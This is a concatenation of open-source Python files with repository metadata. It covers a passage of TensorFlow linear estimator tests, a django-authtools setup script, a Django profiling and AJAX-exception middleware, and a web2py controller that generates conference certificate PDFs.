}, tf.constant([[0], [0], [1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket(
'language', hash_bucket_size=5)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
'country', hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=10)
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[country_language],
optimizer=sdca_optimizer)
classifier.fit(input_fn=input_fn, steps=10)
scores = classifier.evaluate(input_fn=input_fn, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testSdcaOptimizerMixedFeatures(self):
"""Tests LinearClasssifier with SDCAOptimizer and a mix of features."""
def input_fn():
return {
'example_id': tf.constant(['1', '2', '3']),
'price': tf.constant([[0.6], [0.8], [0.3]]),
'sq_footage': tf.constant([[900.0], [700.0], [600.0]]),
'country': tf.SparseTensor(values=['IT', 'US', 'GB'],
indices=[[0, 0], [1, 3], [2, 1]],
shape=[3, 5]),
'weights': tf.constant([[3.0], [1.0], [1.0]])
}, tf.constant([[1], [0], [1]])
price = tf.contrib.layers.real_valued_column('price')
sq_footage_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column('sq_footage'),
boundaries=[650.0, 800.0])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
'country', hash_bucket_size=5)
sq_footage_country = tf.contrib.layers.crossed_column(
[sq_footage_bucket, country],
hash_bucket_size=10)
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[price, sq_footage_bucket, country, sq_footage_country],
weight_column_name='weights',
optimizer=sdca_optimizer)
classifier.fit(input_fn=input_fn, steps=50)
scores = classifier.evaluate(input_fn=input_fn, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testEval(self):
"""Tests that eval produces correct metrics.
"""
def input_fn():
return {
'age': tf.constant([[1], [2]]),
'language': tf.SparseTensor(values=['greek', 'chinese'],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
}, tf.constant([[1], [0]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
age = tf.contrib.layers.real_valued_column('age')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[age, language])
# Evaluate on trained model
classifier.fit(input_fn=input_fn, steps=100)
classifier.evaluate(input_fn=input_fn, steps=1)
# TODO(ispir): Enable accuracy check after resolving the randomness issue.
# self.assertLess(evaluated_values['loss/mean'], 0.3)
# self.assertGreater(evaluated_values['accuracy/mean'], .95)
class LinearRegressorTest(tf.test.TestCase):
def testEstimatorContract(self):
estimator_test_utils.assert_estimator_contract(
self, tf.contrib.learn.LinearRegressor)
def testRegression(self):
"""Tests that loss goes down with training."""
def input_fn():
return {
'age': tf.constant([1]),
'language': tf.SparseTensor(values=['english'],
indices=[[0, 0]],
shape=[1, 1])
}, tf.constant([[10.]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
age = tf.contrib.layers.real_valued_column('age')
classifier = tf.contrib.learn.LinearRegressor(
feature_columns=[age, language])
classifier.fit(input_fn=input_fn, steps=100)
loss1 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
classifier.fit(input_fn=input_fn, steps=200)
loss2 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
self.assertLess(loss2, loss1)
self.assertLess(loss2, 0.5)
def testRegression_MatrixData(self):
"""Tests regression using matrix data as input."""
cont_features = [
tf.contrib.layers.real_valued_column('feature', dimension=4)]
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=cont_features,
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_iris_input_fn, steps=100)
scores = regressor.evaluate(input_fn=_iris_input_fn, steps=1)
self.assertLess(scores['loss'], 0.2)
def testRegression_TensorData(self):
"""Tests regression using tensor data as input."""
def _input_fn(num_epochs=None):
features = {
'age': tf.train.limit_epochs(tf.constant([[0.8], [0.15], [0.]]),
num_epochs=num_epochs),
'language': tf.SparseTensor(values=['en', 'fr', 'zh'],
indices=[[0, 0], [0, 1], [2, 0]],
shape=[3, 2])
}
return features, tf.constant([1.0, 0., 0.2], dtype=tf.float32)
feature_columns = [
tf.contrib.layers.sparse_column_with_hash_bucket('language',
hash_bucket_size=20),
tf.contrib.layers.real_valued_column('age')
]
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=feature_columns,
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn, steps=100)
scores = regressor.evaluate(input_fn=_input_fn, steps=1)
self.assertLess(scores['loss'], 0.2)
def testLoss(self):
"""Tests loss calculation."""
def _input_fn_train():
# Create 4 rows, one of them (y = x), three of them (y=Not(x))
# The algorithm should learn (y = 0.25).
labels = tf.constant([[1.], [0.], [0.], [0.]])
features = {
'x': tf.ones(shape=[4, 1], dtype=tf.float32),
}
return features, labels
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[tf.contrib.layers.real_valued_column('x')],
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn_train, steps=100)
scores = regressor.evaluate(input_fn=_input_fn_train, steps=1)
# Average square loss = (0.75^2 + 3*0.25^2) / 4 = 0.1875
self.assertAlmostEqual(0.1875, scores['loss'], delta=0.1)
def testLossWithWeights(self):
"""Tests loss calculation with weights."""
def _input_fn_train():
# 4 rows with equal weight, one of them (y = x), three of them (y=Not(x))
# The algorithm should learn (y = 0.25).
labels = tf.constant([[1.], [0.], [0.], [0.]])
features = {
'x': tf.ones(shape=[4, 1], dtype=tf.float32),
'w': tf.constant([[1.], [1.], [1.], [1.]])
}
return features, labels
def _input_fn_eval():
# 4 rows, with different weights.
labels = tf.constant([[1.], [0.], [0.], [0.]])
features = {
'x': tf.ones(shape=[4, 1], dtype=tf.float32),
'w': tf.constant([[7.], [1.], [1.], [1.]])
}
return features, labels
regressor = tf.contrib.learn.LinearRegressor(
weight_column_name='w',
feature_columns=[tf.contrib.layers.real_valued_column('x')],
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn_train, steps=100)
scores = regressor.evaluate(input_fn=_input_fn_eval, steps=1)
# Weighted average square loss = (7*0.75^2 + 3*0.25^2) / 10 = 0.4125
self.assertAlmostEqual(0.4125, scores['loss'], delta=0.1)
def testTrainWithWeights(self):
"""Tests training with given weight column."""
def _input_fn_train():
# Create 4 rows, one of them (y = x), three of them (y=Not(x))
# First row has more weight than others. Model should fit (y=x) better
# than (y=Not(x)) due to the relative higher weight of the first row.
labels = tf.constant([[1.], [0.], [0.], [0.]])
features = {
'x': tf.ones(shape=[4, 1], dtype=tf.float32),
'w': tf.constant([[100.], [3.], [2.], [2.]])
}
return features, labels
def _input_fn_eval():
# Create 4 rows (y = x)
labels = tf.constant([[1.], [1.], [1.], [1.]])
features = {
'x': tf.ones(shape=[4, 1], dtype=tf.float32),
'w': tf.constant([[1.], [1.], [1.], [1.]])
}
return features, labels
regressor = tf.contrib.learn.LinearRegressor(
weight_column_name='w',
feature_columns=[tf.contrib.layers.real_valued_column('x')],
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn_train, steps=100)
scores = regressor.evaluate(input_fn=_input_fn_eval, steps=1)
# The model should learn (y = x) because of the weights, so the loss should
# be close to zero.
self.assertLess(scores['loss'], 0.1)
def testPredict_AsIterableFalse(self):
"""Tests predict method with as_iterable=False."""
labels = [1.0, 0., 0.2]
def _input_fn(num_epochs=None):
features = {
'age': tf.train.limit_epochs(tf.constant([[0.8], [0.15], [0.]]),
num_epochs=num_epochs),
'language': tf.SparseTensor(values=['en', 'fr', 'zh'],
indices=[[0, 0], [0, 1], [2, 0]],
shape=[3, 2])
}
return features, tf.constant(labels, dtype=tf.float32)
feature_columns = [
tf.contrib.layers.sparse_column_with_hash_bucket('language',
hash_bucket_size=20),
tf.contrib.layers.real_valued_column('age')
]
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=feature_columns,
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn, steps=100)
scores = regressor.evaluate(input_fn=_input_fn, steps=1)
self.assertLess(scores['loss'], 0.1)
predictions = regressor.predict(input_fn=_input_fn, as_iterable=False)
self.assertAllClose(labels, predictions, atol=0.1)
def testPredict_AsIterable(self):
"""Tests predict method with as_iterable=True."""
labels = [1.0, 0., 0.2]
def _input_fn(num_epochs=None):
features = {
'age': tf.train.limit_epochs(tf.constant([[0.8], [0.15], [0.]]),
num_epochs=num_epochs),
'language': tf.SparseTensor(values=['en', 'fr', 'zh'],
indices=[[0, 0], [0, 1], [2, 0]],
shape=[3, 2])
}
return features, tf.constant(labels, dtype=tf.float32)
feature_columns = [
tf.contrib.layers.sparse_column_with_hash_bucket('language',
hash_bucket_size=20),
tf.contrib.layers.real_valued_column('age')
]
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=feature_columns,
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn, steps=100)
scores = regressor.evaluate(input_fn=_input_fn, steps=1)
self.assertLess(scores['loss'], 0.1)
predict_input_fn = functools.partial(_input_fn, num_epochs=1)
predictions = list(
regressor.predict(input_fn=predict_input_fn, as_iterable=True))
self.assertAllClose(labels, predictions, atol=0.1)
def testCustomMetrics(self):
"""Tests custom evaluation metrics."""
def _input_fn(num_epochs=None):
# Create 4 rows, one of them (y = x), three of them (y=Not(x))
labels = tf.constant([[1.], [0.], [0.], [0.]])
features = {'x': tf.train.limit_epochs(
tf.ones(shape=[4, 1], dtype=tf.float32), num_epochs=num_epochs)}
return features, labels
def _my_metric_op(predictions, labels):
return tf.reduce_sum(tf.mul(predictions, labels))
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[tf.contrib.layers.real_valued_column('x')],
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn, steps=100)
scores = regressor.evaluate(
input_fn=_input_fn,
steps=1,
metrics={
'my_error': MetricSpec(
metric_fn=tf.contrib.metrics.streaming_mean_squared_error,
prediction_key='scores'),
'my_metric': MetricSpec(metric_fn=_my_metric_op,
prediction_key='scores')
})
self.assertIn('loss', set(scores.keys()))
self.assertIn('my_error', set(scores.keys()))
self.assertIn('my_metric', set(scores.keys()))
predict_input_fn = functools.partial(_input_fn, num_epochs=1)
predictions = np.array(list(regressor.predict(input_fn=predict_input_fn)))
self.assertAlmostEqual(
_sklearn.mean_squared_error(np.array([1, 0, 0, 0]), predictions),
scores['my_error'])
# Tests the case where the prediction_key is not "scores".
with self.assertRaisesRegexp(KeyError, 'bad_type'):
regressor.evaluate(
input_fn=_input_fn,
steps=1,
metrics={
'bad_name': MetricSpec(
metric_fn=tf.contrib.metrics.streaming_auc,
prediction_key='bad_type')})
# Tests the case where the 2nd element of the key is not "scores".
with self.assertRaises(KeyError):
regressor.evaluate(
input_fn=_input_fn,
steps=1,
metrics={('my_error', 'predictions'
): tf.contrib.metrics.streaming_mean_squared_error})
# Tests the case where the tuple of the key doesn't have 2 elements.
with self.assertRaises(ValueError):
regressor.evaluate(
input_fn=_input_fn,
steps=1,
metrics={
('bad_length_name', 'scores', 'bad_length'):
tf.contrib.metrics.streaming_mean_squared_error
})
def testTrainSaveLoad(self):
"""Tests that insures you can save and reload a trained model."""
def _input_fn(num_epochs=None):
features = {
'age': tf.train.limit_epochs(tf.constant([[0.8], [0.15], [0.]]),
num_epochs=num_epochs),
'language': tf.SparseTensor(values=['en', 'fr', 'zh'],
indices=[[0, 0], [0, 1], [2, 0]],
shape=[3, 2])
}
return features, tf.constant([1.0, 0., 0.2], dtype=tf.float32)
feature_columns = [
tf.contrib.layers.sparse_column_with_hash_bucket('language',
hash_bucket_size=20),
tf.contrib.layers.real_valued_column('age')
]
model_dir = tempfile.mkdtemp()
regressor = tf.contrib.learn.LinearRegressor(
model_dir=model_dir,
feature_columns=feature_columns,
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn, steps=100)
predict_input_fn = functools.partial(_input_fn, num_epochs=1)
predictions = list(regressor.predict(input_fn=predict_input_fn))
del regressor
regressor2 = tf.contrib.learn.LinearRegressor(
model_dir=model_dir,
feature_columns=feature_columns)
predictions2 = list(regressor2.predict(input_fn=predict_input_fn))
self.assertAllClose(predictions, predictions2)
def testTrainWithPartitionedVariables(self):
"""Tests training with partitioned variables."""
def _input_fn(num_epochs=None):
features = {
'age': tf.train.limit_epochs(tf.constant([[0.8], [0.15], [0.]]),
num_epochs=num_epochs),
'language': tf.SparseTensor(values=['en', 'fr', 'zh'],
indices=[[0, 0], [0, 1], [2, 0]],
shape=[3, 2])
}
return features, tf.constant([1.0, 0., 0.2], dtype=tf.float32)
feature_columns = [
# The given hash_bucket_size results in variables larger than the
# default min_slice_size attribute, so the variables are partitioned.
tf.contrib.layers.sparse_column_with_hash_bucket('language',
hash_bucket_size=2e7),
tf.contrib.layers.real_valued_column('age')
]
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=feature_columns,
# Because we did not start a distributed cluster, we need to pass an
# empty ClusterSpec, otherwise the device_setter will look for
# distributed jobs, such as "/job:ps" which are not present.
config=tf.contrib.learn.RunConfig(
num_ps_replicas=2, cluster_spec=tf.train.ClusterSpec({}),
tf_random_seed=1))
regressor.fit(input_fn=_input_fn, steps=100)
scores = regressor.evaluate(input_fn=_input_fn, steps=1)
self.assertLess(scores['loss'], 0.1)
def testDisableCenteredBias(self):
"""Tests that we can disable centered bias."""
def _input_fn(num_epochs=None):
features = {
'age': tf.train.limit_epochs(tf.constant([[0.8], [0.15], [0.]]),
num_epochs=num_epochs),
'language': tf.SparseTensor(values=['en', 'fr', 'zh'],
indices=[[0, 0], [0, 1], [2, 0]],
shape=[3, 2])
}
return features, tf.constant([1.0, 0., 0.2], dtype=tf.float32)
feature_columns = [
tf.contrib.layers.sparse_column_with_hash_bucket('language',
hash_bucket_size=20),
tf.contrib.layers.real_valued_column('age')
]
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=feature_columns,
enable_centered_bias=False,
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
regressor.fit(input_fn=_input_fn, steps=100)
scores = regressor.evaluate(input_fn=_input_fn, steps=1)
self.assertLess(scores['loss'], 0.1)
def testRecoverWeights(self):
rng = np.random.RandomState(67)
n = 1000
n_weights = 10
bias = 2
x = rng.uniform(-1, 1, (n, n_weights))
weights = 10 * rng.randn(n_weights)
y = np.dot(x, weights)
y += rng.randn(len(x)) * 0.05 + rng.normal(bias, 0.01)
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input(x)
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=feature_columns,
optimizer=tf.train.FtrlOptimizer(learning_rate=0.8))
regressor.fit(x, y, batch_size=64, steps=2000)
# Have to flatten weights since they come in (x, 1) shape.
self.assertAllClose(weights, regressor.weights_.flatten(), rtol=1)
# TODO(ispir): Disable centered_bias.
# assert abs(bias - regressor.bias_) < 0.1
def testSdcaOptimizerRealValuedLinearFeatures(self):
"""Tests LinearRegressor with SDCAOptimizer and real valued features."""
x = [[1.2, 2.0, -1.5], [-2.0, 3.0, -0.5], [1.0, -0.5, 4.0]]
weights = [[3.0], [-1.2], [0.5]]
y = np.dot(x, weights)
def input_fn():
return {
'example_id': tf.constant(['1', '2', '3']),
'x': tf.constant(x),
'weights': tf.constant([[10.0], [10.0], [10.0]])
}, tf.constant(y)
x_column = tf.contrib.layers.real_valued_column('x', dimension=3)
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[x_column],
weight_column_name='weights',
optimizer=sdca_optimizer)
regressor.fit(input_fn=input_fn, steps=20)
loss = regressor.evaluate(input_fn=input_fn, steps=1)['loss']
self.assertLess(loss, 0.01)
self.assertAllClose([w[0] for w in weights],
regressor.weights_.flatten(), rtol=0.1)
def testSdcaOptimizerMixedFeaturesArbitraryWeights(self):
"""Tests LinearRegressor with SDCAOptimizer and a mix of features."""
def input_fn():
return {
'example_id': tf.constant(['1', '2', '3']),
'price': tf.constant([[0.6], [0.8], [0.3]]),
'sq_footage': tf.constant([[900.0], [700.0], [600.0]]),
'country': tf.SparseTensor(
values=['IT', 'US', 'GB'],
indices=[[0, 0], [1, 3], [2, 1]],
shape=[3, 5]),
'weights': tf.constant([[3.0], [5.0], [7.0]])
}, tf.constant([[1.55], [-1.25], [-3.0]])
price = tf.contrib.layers.real_valued_column('price')
sq_footage_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column('sq_footage'),
boundaries=[650.0, 800.0])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
'country', hash_bucket_size=5)
sq_footage_country = tf.contrib.layers.crossed_column(
[sq_footage_bucket, country], hash_bucket_size=10)
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id', symmetric_l2_regularization=1.0)
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[price, sq_footage_bucket, country, sq_footage_country],
weight_column_name='weights',
optimizer=sdca_optimizer)
regressor.fit(input_fn=input_fn, steps=20)
loss = regressor.evaluate(input_fn=input_fn, steps=1)['loss']
self.assertLess(loss, 0.05)
def testSdcaOptimizerSparseFeaturesWithL1Reg(self):
"""Tests LinearClasssifier with SDCAOptimizer and sparse features."""
def input_fn():
return {
'example_id': tf.constant(['1', '2', '3']),
'price': tf.constant([[0.4], [0.6], [0.3]]),
'country': tf.SparseTensor(
values=['IT', 'US', 'GB'],
indices=[[0, 0], [1, 3], [2, 1]],
shape=[3, 5]),
'weights': tf.constant([[10.0], [10.0], [10.0]])
}, tf.constant([[1.4], [-0.8], [2.6]])
price = tf.contrib.layers.real_valued_column('price')
country = tf.contrib.layers.sparse_column_with_hash_bucket(
'country', hash_bucket_size=5)
# Regressor with no L1 regularization.
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[price, country],
weight_column_name='weights',
optimizer=sdca_optimizer)
regressor.fit(input_fn=input_fn, steps=20)
no_l1_reg_loss = regressor.evaluate(input_fn=input_fn, steps=1)['loss']
no_l1_reg_weights = regressor.weights_
# Regressor with L1 regularization.
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id', symmetric_l1_regularization=1.0)
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[price, country],
weight_column_name='weights',
optimizer=sdca_optimizer)
regressor.fit(input_fn=input_fn, steps=20)
l1_reg_loss = regressor.evaluate(input_fn=input_fn, steps=1)['loss']
l1_reg_weights = regressor.weights_
# Unregularized loss is lower when there is no L1 regularization.
self.assertLess(no_l1_reg_loss, l1_reg_loss)
self.assertLess(no_l1_reg_loss, 0.05)
# But weights returned by the regressor with L1 regularization have smaller
# L1 norm.
l1_reg_weights_norm, no_l1_reg_weights_norm = 0.0, 0.0
for var_name in sorted(l1_reg_weights):
l1_reg_weights_norm += sum(
np.absolute(l1_reg_weights[var_name].flatten()))
no_l1_reg_weights_norm += sum(
np.absolute(no_l1_reg_weights[var_name].flatten()))
print('Var name: %s, value: %s' %
(var_name, no_l1_reg_weights[var_name].flatten()))
self.assertLess(l1_reg_weights_norm, no_l1_reg_weights_norm)
def testSdcaOptimizerBiasOnly(self):
"""Tests LinearClasssifier with SDCAOptimizer and validates bias weight."""
def input_fn():
"""Testing the bias weight when it's the only feature present.
All of the instances in this input only have the bias feature, and a
1/4 of the labels are positive. This means that the expected weight for
the bias should be close to the average prediction, i.e 0.25.
Returns:
Training data for the test.
"""
num_examples = 40
return {
'example_id': tf.constant([str(x+1) for x in range(num_examples)]),
# place_holder is an empty column which is always 0 (absent), because
# LinearClassifier requires at least one column.
'place_holder': tf.constant([[0.0]]*num_examples),
}, tf.constant([[1 if i % 4 is 0 else 0] for i in range(num_examples)])
place_holder = tf.contrib.layers.real_valued_column('place_holder')
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[place_holder],
optimizer=sdca_optimizer)
regressor.fit(input_fn=input_fn, steps=100)
self.assertNear(regressor.get_variable_value('linear/bias_weight')[0],
0.25, err=0.1)
def testSdcaOptimizerBiasAndOtherColumns(self):
"""Tests LinearClasssifier with SDCAOptimizer and validates bias weight."""
def input_fn():
"""Testing the bias weight when there are other features present.
1/2 of the instances in this input have feature 'a', the rest have
feature 'b', and we expect the bias to be added to each instance as well.
0.4 of all instances that have feature 'a' are positive, and 0.2 of all
instances that have feature 'b' are positive. The labels in the dataset
are ordered to appear shuffled since SDCA expects shuffled data, and
converges faster with this pseudo-random ordering.
If the bias was centered we would expect the weights to be:
bias: 0.3
a: 0.1
b: -0.1
Until b/29339026 is resolved, the bias gets regularized with the same
global value for the other columns, and so the expected weights get
shifted and are:
bias: 0.2
a: 0.2
b: 0.0
Returns:
The test dataset.
"""
num_examples = 200
half = int(num_examples/2)
return {
'example_id': tf.constant([str(x+1) for x in range(num_examples)]),
'a': tf.constant([[1]]*int(half) + [[0]]*int(half)),
'b': tf.constant([[0]]*int(half) + [[1]]*int(half)),
}, tf.constant([[x] for x in
[1, 0, 0, 1, 1, 0, 0, 0, 1, 0] * int(half/10) +
[0, 1, 0, 0, 0, 0, 0, 0, 1, 0] * int(half/10)])
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[tf.contrib.layers.real_valued_column('a'),
tf.contrib.layers.real_valued_column('b')],
optimizer=sdca_optimizer)
regressor.fit(input_fn=input_fn, steps=200)
# TODO(b/29339026): Change the expected results to expect a centered bias.
self.assertNear(
regressor.get_variable_value('linear/bias_weight')[0], 0.2, err=0.05)
self.assertNear(regressor.weights_['linear/a/weight'][0], 0.2, err=0.05)
self.assertNear(regressor.weights_['linear/b/weight'][0], 0.0, err=0.05)
def testSdcaOptimizerBiasAndOtherColumnsFabricatedCentered(self):
"""Tests LinearClasssifier with SDCAOptimizer and validates bias weight."""
def input_fn():
"""Testing the bias weight when there are other features present.
1/2 of the instances in this input have feature 'a', the rest have
feature 'b', and we expect the bias to be added to each instance as well.
0.1 of all instances that have feature 'a' have a label of 1, and 0.1 of
all instances that have feature 'b' have a label of -1.
We can expect the weights to be:
bias: 0.0
a: 0.1
b: -0.1
Returns:
The test dataset.
"""
num_examples = 200
half = int(num_examples/2)
return {
'example_id': tf.constant([str(x+1) for x in range(num_examples)]),
'a': tf.constant([[1]]*int(half) + [[0]]*int(half)),
'b': tf.constant([[0]]*int(half) + [[1]]*int(half)),
}, tf.constant([[1 if x%10 == 0 else 0] for x in range(half)] +
[[-1 if x%10 == 0 else 0] for x in range(half)])
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
regressor = tf.contrib.learn.LinearRegressor(
feature_columns=[tf.contrib.layers.real_valued_column('a'),
tf.contrib.layers.real_valued_column('b')],
optimizer=sdca_optimizer)
regressor.fit(input_fn=input_fn, steps=100)
self.assertNear(
regressor.get_variable_value('linear/bias_weight')[0], 0.0, err=0.05)
self.assertNear(regressor.weights_['linear/a/weight'][0], 0.1, err=0.05)
self.assertNear(regressor.weights_['linear/b/weight'][0], -0.1, err=0.05)
def boston_input_fn():
boston = tf.contrib.learn.datasets.load_boston()
features = tf.cast(tf.reshape(tf.constant(boston.data), [-1, 13]), tf.float32)
labels = tf.cast(tf.reshape(tf.constant(boston.target), [-1, 1]), tf.float32)
return features, labels
class FeatureColumnTest(tf.test.TestCase):
def testTrain(self):
feature_columns = tf.contrib.learn.infer_real_valued_columns_from_input_fn(
boston_input_fn)
est = tf.contrib.learn.LinearRegressor(feature_columns=feature_columns)
est.fit(input_fn=boston_input_fn, steps=1)
_ = est.evaluate(input_fn=boston_input_fn, steps=1)
if __name__ == '__main__':
tf.test.main()
|
tongwang01/tensorflow
|
tensorflow/contrib/learn/python/learn/estimators/linear_test.py
|
Python
|
apache-2.0
| 59,870
|
#!/usr/bin/env python
from setuptools import setup, find_packages
import os
import io
__doc__ = ("Custom user model app for Django featuring email as username and"
" class-based views for authentication.")
def read(fname):
return io.open(os.path.join(os.path.dirname(__file__), fname), encoding="utf-8").read()
install_requires = [
'Django>=1.5',
]
setup(
name='django-authtools',
version='1.2.1.dev0',
author='Fusionbox, Inc.',
author_email='programmers@fusionbox.com',
description=__doc__,
long_description='\n\n'.join([read('README.rst'), read('CHANGES.rst')]),
url='https://django-authtools.readthedocs.org/',
license='BSD',
packages=[package for package in find_packages() if package.startswith('authtools')],
install_requires=install_requires,
zip_safe=False,
include_package_data=True,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
],
)
|
vuchau/django-authtools
|
setup.py
|
Python
|
bsd-2-clause
| 1,342
|
# python imports
import hotshot
import hotshot.stats
import sys
import tempfile
from cStringIO import StringIO
# django imports
from django.conf import settings
from django.http import HttpResponseServerError
class ProfileMiddleware(object):
"""
Displays hotshot profiling for any view.
http://yoursite.com/yourview/?prof
Add the "prof" key to query string by appending ?prof (or &prof=)
and you'll see the profiling results in your browser.
It's set up to only be available in django's debug mode,
but you really shouldn't add this middleware to any production configuration.
* Only tested on Linux
"""
def process_request(self, request):
if 'prof' in request.GET:
self.tmpfile = tempfile.NamedTemporaryFile()
self.prof = hotshot.Profile(self.tmpfile.name)
def process_view(self, request, callback, callback_args, callback_kwargs):
if 'prof' in request.GET:
return self.prof.runcall(callback, request, *callback_args, **callback_kwargs)
def process_response(self, request, response):
if 'prof' in request.GET:
self.prof.close()
out = StringIO()
old_stdout = sys.stdout
sys.stdout = out
stats = hotshot.stats.load(self.tmpfile.name)
# stats.strip_dirs()
stats.sort_stats('cumulative', )
# stats.sort_stats('time', )
stats.print_stats()
sys.stdout = old_stdout
stats_str = out.getvalue()
if response and response.content and stats_str:
response.content = "<pre>" + stats_str + "</pre>"
return response
class AJAXSimpleExceptionResponse:
def process_exception(self, request, exception):
if settings.DEBUG:
if request.is_ajax():
import sys
import traceback
(exc_type, exc_info, tb) = sys.exc_info()
response = "%s\n" % exc_type.__name__
response += "%s\n\n" % exc_info
response += "TRACEBACK:\n"
for tb in traceback.format_tb(tb):
response += "%s\n" % tb
return HttpResponseServerError(response)
|
pigletto/django-lfs
|
lfs/utils/middleware.py
|
Python
|
bsd-3-clause
| 2,254
|
# coding: utf8
# try something like
try:
from gluon.contrib.pyfpdf import Template
except ImportError:
# import local module until we can update web2py...
Template = local_import('template').Template
raise
@auth.requires_membership(role="manager")
def speakers():
template_id = int(request.args[0])
speakers = db(db.auth_user.speaker==True).select(orderby=db.auth_user.id)
return render_pdf(speakers, template_id, "Disertante", "S")
@auth.requires_membership(role="manager")
def attendees():
template_id = int(request.args[0])
q = db.auth_user.speaker==False
q &= db.auth_user.id > int(request.args[1])
q &= db.auth_user.attendee_type == "gratis"
speakers = db(q).select(orderby=db.auth_user.id)
return render_pdf(speakers, template_id, "Participante", "A")
@auth.requires_membership(role="manager")
def bono():
template_id = int(request.args[0])
q = db.auth_user.speaker==False
q &= db.auth_user.attendee_type != "gratis"
q &= db.auth_user.id > int(request.args[1])
speakers = db(q).select(orderby=db.auth_user.id)
return render_pdf(speakers, template_id, "Participante", "B")
def render_pdf(users, template_id, attendee_type, flag=""):
# read elements from db
elements = db(db.pdf_element.pdf_template_id==template_id).select(orderby=db.pdf_element.priority)
f = Template(format="A4",
elements = elements,
title="Speaker Certificate", author="web2conf",
orientation="Landscape",
subject="", keywords="")
# fill placeholders for each page
for user in users:
f.add_page()
s = unicode("%s %s" % (user.first_name, user.last_name), "utf8")
if user.dni:
s = u"%s (DNI %s)" % (s, user.dni)
f['name'] = s
f['id'] = "%s%s" % (user.id, flag)
f['attendee_type'] = attendee_type
#break
response.headers['Content-Type']='application/pdf'
return f.render('speaker_cert.pdf', dest='S')
|
bkahlerventer/web2congress
|
controllers/certificate.py
|
Python
|
bsd-3-clause
| 2,022
|